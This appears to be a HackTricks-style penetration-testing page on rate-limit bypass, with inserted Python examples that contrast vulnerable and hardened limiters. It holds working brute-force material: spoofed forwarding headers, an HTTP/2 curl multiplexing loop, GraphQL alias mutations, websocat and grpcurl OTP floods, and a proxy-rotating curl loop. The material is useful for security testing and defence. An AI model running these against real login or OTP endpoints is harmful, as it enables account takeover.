Rate Limit Bypass

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Rate limit bypass techniques

Exploring Similar Endpoints

Rate limits are frequently bound to one exact path string, so brute-force variations of the target endpoint. For a target such as /api/v3/sign-up, try case and spelling variants and other API versions: /Sing-up, /SignUp, /singup, /api/v1/sign-up, /api/sign-up, etc. If any variant reaches the same handler without passing through the limiter, it can be attacked freely.

Incorporating Blank Characters in Code or Parameters

Inserting blank bytes such as %00, %0d%0a, %0d, %0a, %09, %0C, %20 into the code or parameters can be a useful technique. The trick works when the application normalises the value (for example trims whitespace) before validating it, while the limiter keys on the raw value it received. For example, changing the parameter to code=1234%0a lets you extend your attempts through input variations, such as appending newline characters to an email address to get around per-value attempt limits.

Altering IP Origin via Headers

Modifying headers that change the perceived source IP can help evade IP-based rate limiting. This only works when the application or gateway trusts client-supplied forwarding headers instead of the socket address. Headers such as X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr, X-Client-IP, X-Host and X-Forwarded-Host, including sending multiple X-Forwarded-For headers, can be set to make each request appear to come from a different IP.

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwarded-Host: 127.0.0.1

# Double X-Forwarded-For header example
X-Forwarded-For:
X-Forwarded-For: 127.0.0.1

Changing Other Headers

It is also worth changing other request headers such as the User-Agent and cookies, since they can be used to fingerprint and track request patterns. Varying them prevents the requester's activity from being recognised and correlated.

Leveraging API Gateway Behavior

Some API gateways apply rate limiting on the combination of endpoint and parameters. By varying parameter values, or adding irrelevant parameters to the request, every request looks unique to the gateway's rate-limiting logic and is never counted against the same bucket. For example /resetpwd?someparam=1.
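The reason the header tricks (X-Forwarded-For and friends) and the junk-parameter trick work is the same: the limiter derives its key from attacker-controlled input. The following is an added example, not HackTricks' code or any real gateway's: a hypothetical in-process limiter with two key functions, one that trusts the first X-Forwarded-For value and the raw URL, and a hardened one that takes the IP from the socket (or the right-most untrusted hop when the peer is a known proxy) and normalises the path. The request dictionaries and the trusted-proxy address 10.0.0.1 are constructed.

```python
"""Added example: how the limiter *key* decides whether header/parameter tricks work."""
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import urlsplit

LIMIT = 5          # attempts allowed per key per window
WINDOW = 60.0      # seconds


class Limiter:
    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.hits = defaultdict(list)

    def allow(self, req, now):
        key = self.key_fn(req)
        recent = [t for t in self.hits[key] if now - t < WINDOW]
        self.hits[key] = recent
        if len(recent) >= LIMIT:
            return False
        recent.append(now)
        return True


def naive_key(req):
    """Bug 1: trusts the first X-Forwarded-For value (attacker controlled).
    Bug 2: keys on the raw URL, so '?someparam=1' opens a fresh bucket."""
    xff = req["headers"].get("X-Forwarded-For", "")
    ip = xff.split(",")[0].strip() or req["remote_addr"]
    return (ip, req["url"])


TRUSTED_PROXIES = {"10.0.0.1"}   # assumption: the only hop allowed to set XFF


def hardened_key(req):
    """Client IP comes from the socket; only if the peer is a trusted proxy do we
    walk X-Forwarded-For from the right to the first untrusted hop.  The path is
    normalised (lower-cased, query string and trailing slash removed)."""
    ip = req["remote_addr"]
    if ip in TRUSTED_PROXIES:
        hops = [p.strip() for p in req["headers"].get("X-Forwarded-For", "").split(",") if p.strip()]
        for cand in reversed(hops):
            if cand not in TRUSTED_PROXIES:
                ip = cand
                break
    try:
        ip = str(ip_address(ip))          # reject garbage like "127.0.0.1 " or "x"
    except ValueError:
        ip = req["remote_addr"]
    path = urlsplit(req["url"]).path.rstrip("/").lower() or "/"
    return (ip, path)


def brute_force(limiter, attempts):
    """Return how many of `attempts` the limiter lets through (all within one window)."""
    return sum(limiter.allow(r, now=float(i)) for i, r in enumerate(attempts))


def attacker_requests(n):
    """Constructed traffic: n attempts from ONE real IP, each with a spoofed XFF
    and a junk query parameter, i.e. both tricks from the text at once."""
    return [{
        "remote_addr": "203.0.113.7",
        "headers": {"X-Forwarded-For": f"192.0.2.{i}"},
        "url": f"/resetpwd?someparam={i}",
    } for i in range(n)]


if __name__ == "__main__":
    reqs = attacker_requests(20)
    print("naive limiter let through:   ", brute_force(Limiter(naive_key), reqs))
    print("hardened limiter let through:", brute_force(Limiter(hardened_key), reqs))
```

When probing a target, the same idea applies in reverse: send a burst with a fixed spoofed header and a burst with a rotating one; if only the rotating burst escapes the 429s, the key is derived from that header.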

Logging into Your Account Before Each Attempt

Logging in to an account before each attempt, or before each batch of attempts, may reset the rate-limit counter. This is especially useful when testing login functionality. In Burp Suite, a Pitchfork attack that rotates credentials every few attempts, with "follow redirects" enabled, can keep restarting the counters.

Utilizing Proxy Networks

Setting up a proxy network that spreads requests over many IP addresses can effectively bypass IP-based rate limits. Routing traffic through different proxies makes each request appear to come from a different source, which defeats a limiter keyed on the client IP.

Splitting the Attack Across Different Accounts or Sessions

If the target enforces rate limits per account or per session, spreading the attack across many accounts or sessions keeps each one under its threshold. This requires managing many identities or session tokens, but it distributes the load so that every individual counter stays within the allowed limit.

Keep Trying

Remember that even when a rate limit exists, check whether the response differs when the valid OTP is sent. In this post, the bug hunter found that although a rate limit was triggered after 20 unsuccessful attempts (the server answered 401), sending the valid code still returned a 200 response, because the lockout was only applied to wrong codes.
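That behaviour comes from the order of the checks on the server. The following is an added example, not code from the post or from HackTricks: two hypothetical OTP verifiers that differ only in whether the counter is charged before or after the code is compared, and a brute-force loop that keeps going through 401s instead of stopping at the first sign of a lockout. The secret code and the guesses are constructed.

```python
"""Added example: a lockout that only counts failures lets the right code through."""
from collections import defaultdict

MAX_FAILS = 20
SECRET_CODE = "483920"   # constructed sample OTP


class VulnerableVerifier:
    """Compares the code FIRST and only counts failures, so a correct guess never
    meets the limiter: after 20 failures a wrong code gets 401, the right one 200."""
    def __init__(self):
        self.fails = defaultdict(int)

    def verify(self, user, code):
        if code == SECRET_CODE:
            return 200
        self.fails[user] += 1
        if self.fails[user] > MAX_FAILS:
            return 401     # "locked out", but only wrong codes ever reach this line
        return 400


class HardenedVerifier:
    """Charges every attempt against the counter BEFORE looking at the code."""
    def __init__(self):
        self.attempts = defaultdict(int)

    def verify(self, user, code):
        self.attempts[user] += 1
        if self.attempts[user] > MAX_FAILS:
            return 429
        return 200 if code == SECRET_CODE else 400


def brute(verifier, user, guesses):
    """Try every guess, ignoring 401/429, and stop only on a 200.
    Returns (status of every request sent, the guess that succeeded or None)."""
    statuses, found = [], None
    for g in guesses:
        status = verifier.verify(user, g)
        statuses.append(status)
        if status == 200:
            found = g
            break
    return statuses, found


def guesses_after_lockout():
    """Constructed: 25 wrong codes (enough to trip the lockout), then the real one."""
    return [f"{i:06d}" for i in range(25)] + [SECRET_CODE]


if __name__ == "__main__":
    for cls in (VulnerableVerifier, HardenedVerifier):
        statuses, found = brute(cls(), "bob", guesses_after_lockout())
        print(f"{cls.__name__}: last statuses {statuses[-3:]}, found {found}")
```

In Burp or a custom script this translates to: never abort an attack on a 401/429 storm, and compare status, length and body of every response rather than assuming the lockout is real.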


Abusing HTTP/2 multiplexing & request pipelining (2023-2025)

Many rate-limiter implementations count TCP connections (or individual HTTP/1.1 requests) rather than the number of HTTP/2 streams a connection carries. As long as the same TLS connection is reused, an attacker can open hundreds of parallel streams, each carrying a different request, while the gateway deducts only one request from the quota.

# Send 100 POST requests multiplexed over ONE HTTP/2 connection with curl (>= 7.66).
# Spawning one curl per request would open one connection each; instead build a
# config entry per guess (separated by "next") and let -Z/--parallel multiplex them.
for n in $(seq 1 100); do
  printf 'url = "https://target/api/v2/verify"\nheader = "Content-Type: application/json"\ndata = "{\\"code\\":\\"%s\\"}"\nnext\n' "$n"
done | sed '$d' > reqs.cfg
curl -k -s -o /dev/null --http2-prior-knowledge -Z --parallel-max 100 -K reqs.cfg

If the limiter only protects /verify but not /api/v2/verify, you can combine path confusion with HTTP/2 multiplexing for very fast OTP or credential brute-forcing.

🐾 Tip: PortSwigger's Turbo Intruder supports HTTP/2 and lets you set maxConcurrentConnections and requestsPerConnection to automate this attack.

GraphQL aliases & batched operations

GraphQL lets a client send several semantically independent queries or mutations in a single request by prefixing them with aliases. Because the server executes every alias while the rate limiter usually counts only one HTTP request, this is a reliable bypass for login or password-reset throttling.

mutation bruteForceOTP {
a: verify(code:"111111") { token }
b: verify(code:"222222") { token }
c: verify(code:"333333") { token }
# … add up to dozens of aliases …
}

Inspect the response body rather than the HTTP status: the alias that carried the correct code returns a token, while the others come back null with an entry under "errors". Since the whole request counted as a single attempt, none of the aliases is throttled.

The technique gained popularity through PortSwigger's research on "GraphQL batching & aliases" in 2023 and has been behind many recent bug-bounty payouts.

Abusing batch or bulk REST endpoints

Some APIs expose helper endpoints such as /v2/batch, or accept an array of objects in the request body. If the limiter only sits in front of the legacy endpoints, wrapping many operations inside a single bulk request can bypass the protection entirely.

[
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"123"}},
{"path": "/login", "method": "POST", "body": {"user":"bob","pass":"456"}}
]
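Both the GraphQL alias trick and the bulk REST trick exploit a limiter that charges per HTTP request rather than per operation. The following is an added example, not PortSwigger's or HackTricks' code: it generates the aliased mutation shown above for any number of codes, maps the aliases in a response back to the code that succeeded, and shows the server-side fix, a cost function that charges one attempt per alias or per batch element. The field names (verify, token) follow the snippet above; the response shape is a constructed sample, and the alias detection is a regex heuristic, not a GraphQL parser.

```python
"""Added example: build an aliased GraphQL brute-force document and cost it per operation."""
import json
import re


def alias_for(i):
    """a, b, ..., z, aa, ab, ...: valid GraphQL names for any number of aliases."""
    s, i = "", i + 1
    while i:
        i, r = divmod(i - 1, 26)
        s = chr(97 + r) + s
    return s


def build_alias_mutation(codes, field="verify"):
    """One aliased call of `field` per code, as in the snippet above."""
    lines = [f"{alias_for(i)}: {field}(code:{json.dumps(code)}) {{ token }}"
             for i, code in enumerate(codes)]
    return "mutation bruteForceOTP {\n  " + "\n  ".join(lines) + "\n}"


def successful_aliases(response_json, codes):
    """Map every alias that returned a token back to the code it carried.
    Failed aliases come back as null under data (and are listed under errors)."""
    data = response_json.get("data") or {}
    return {codes[i]: data[alias_for(i)]["token"]
            for i in range(len(codes))
            if data.get(alias_for(i)) and data[alias_for(i)].get("token")}


# ---- server side: what the limiter should charge for one request ----------
ALIAS_RE = re.compile(r"^\s*\w+\s*:\s*\w+\s*\(", re.M)   # heuristic, not a full parser


def operation_cost(body):
    """Attempts a request body is worth: one per element of a JSON array (bulk
    REST), one per aliased field in a GraphQL document, otherwise one."""
    try:
        parsed = json.loads(body)
    except ValueError:
        parsed = None
    if isinstance(parsed, list):
        return max(1, len(parsed))
    doc = parsed.get("query", "") if isinstance(parsed, dict) else body
    return max(1, len(ALIAS_RE.findall(doc)))


if __name__ == "__main__":
    codes = ["111111", "222222", "333333"]
    query = build_alias_mutation(codes)
    print(query)
    # Constructed sample response: only alias "b" succeeded.
    sample = {"data": {"a": None, "b": {"token": "tok-b"}, "c": None},
              "errors": [{"path": ["a"]}, {"path": ["c"]}]}
    print("hit:", successful_aliases(sample, codes))
    print("limiter should charge:", operation_cost(json.dumps({"query": query})), "attempts")
    print("bulk body charges:", operation_cost('[{"path":"/login"},{"path":"/login"}]'))
```

A limiter that uses operation_cost (or, better, the count the GraphQL engine itself reports after parsing) closes both bypasses at once; capping the number of aliases per document is the usual complementary control.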

Timing the rate-limit window

A typical fixed-window limiter (and token-bucket implementations that refill in one lump rather than continuously) resets on a fixed time boundary, for example every minute. If the window is known (for instance from a response header such as X-RateLimit-Reset: 27), send the maximum allowed number of requests immediately before the bucket resets, then fire another full burst right after it.

|<-- 60 s window -->|<-- 60 s window -->|
              ###### ######

This simple optimisation packs two full quotas into the few seconds around the boundary, doubling your burst throughput without touching any other bypass technique.
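To see why the edge burst works, and why a true sliding window is immune to it, here is an added example that is not part of the page: a hypothetical fixed-window counter and a sliding-window log, both fed the same constructed traffic of one full burst just before the reset and one just after.

```python
"""Added example: fixed-window counter vs sliding-window log under an edge burst."""
from collections import deque

LIMIT = 10      # requests allowed per window
WINDOW = 60.0   # seconds


def fixed_window(times):
    """Counter resets at every multiple of WINDOW (the behaviour the text exploits).
    Returns the timestamps that were accepted."""
    accepted, current_window, count = [], None, 0
    for t in times:
        w = int(t // WINDOW)
        if w != current_window:
            current_window, count = w, 0
        if count < LIMIT:
            count += 1
            accepted.append(t)
    return accepted


def sliding_window(times):
    """Keeps the timestamps of the last WINDOW seconds; there is no edge to align with."""
    accepted, log = [], deque()
    for t in times:
        while log and t - log[0] >= WINDOW:
            log.popleft()
        if len(log) < LIMIT:
            log.append(t)
            accepted.append(t)
    return accepted


def edge_burst(reset_at=60.0, per_burst=LIMIT, spacing=0.05):
    """Constructed attack traffic: a full burst just before the reset boundary
    and another full burst right after it (the '###### ######' picture above)."""
    before = [reset_at - spacing * (per_burst - i) for i in range(per_burst)]
    after = [reset_at + spacing * i for i in range(per_burst)]
    return before + after


def peak_rate(accepted, span=WINDOW):
    """Largest number of accepted requests inside any `span` seconds."""
    best = 0
    for i, t in enumerate(accepted):
        j = i
        while j < len(accepted) and accepted[j] - t < span:
            j += 1
        best = max(best, j - i)
    return best


if __name__ == "__main__":
    traffic = edge_burst()
    for name, fn in (("fixed window", fixed_window), ("sliding window", sliding_window)):
        ok = fn(traffic)
        print(f"{name}: accepted {len(ok)} of {len(traffic)}, peak per 60 s = {peak_rate(ok)}")
```

The fixed-window limiter accepts all 20 requests within about a second (twice its nominal limit), whereas the sliding log accepts exactly LIMIT. When a target answers with X-RateLimit-Reset or a predictable Retry-After, it is a hint that the counter is window-aligned and worth timing.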

Upgrading to WebSockets / gRPC streaming after the handshake

Many edge rate-limiters only inspect the initial HTTP request. Once the connection has been upgraded to a WebSocket (HTTP 101) or a gRPC bidirectional stream, subsequent messages often bypass the requests-per-second counters because they are no longer separate HTTP requests. Cloudflare's documentation states that only the initial upgrade request is subject to WAF/rate-limiting rules; the frames sent afterwards are opaque to it.

Practical workflow:

# Flood 1,000 OTP guesses through a single WebSocket connection
seq -w 000000 000999 | websocat -n ws://target.tld/api/verify-ws

# gRPC streaming: send multiple Verify requests in one stream
grpcurl -d @ -plaintext target.tld:50051 service.VerifyOTP/Stream <<'EOF'
{ "code": "111111" }
{ "code": "222222" }
{ "code": "333333" }
EOF

If a login/OTP endpoint is offered both over plain HTTP and over WebSocket/gRPC, establish the upgraded channel first and then stream the codes over that single connection to sidestep per-request throttles.

Abusing CDN PoP-sharded counters

Some CDNs keep rate-limit counters per data center/PoP instead of globally. Cloudflare explicitly documents that counters are not shared between data centers. By routing requests through egress nodes in many regions (residential proxy pools, anycast VPNs, or cloud VMs pinned to different continents) you multiply the allowed throughput: each PoP keeps an independent bucket for the same key.

A quick and dirty setup with a list of proxies that rotates across countries (one request per proxy, all in parallel):

# proxies.txt: one proxy URL per line, ideally spread over many countries/PoPs
for p in $(cat proxies.txt); do
  HTTPS_PROXY="$p" curl -s -o /dev/null -X POST https://target/api/login -d @payload.json &
done
wait

Make sure the limiter key is not per-account; otherwise also rotate user IDs / session tokens.


Tools

  • https://github.com/Hashtag-AMIN/hashtag-fuzz: Fuzzing tool that supports header randomisation, chunked word-lists and round-robin proxy rotation.
  • https://github.com/ustayready/fireprox: Automatically creates disposable AWS API Gateway endpoints so that every request comes from a different IP address, ideal for defeating IP-based throttling.
  • Burp Suite – IPRotate + extension: Uses a pool of SOCKS/HTTP proxies (or AWS API Gateway) to rotate the source IP transparently during Intruder and Turbo Intruder attacks.
  • Turbo Intruder (BApp): High-performance attack engine with HTTP/2 multiplexing support; set requestsPerConnection to 100-1000 to pack hundreds of requests into a single connection.
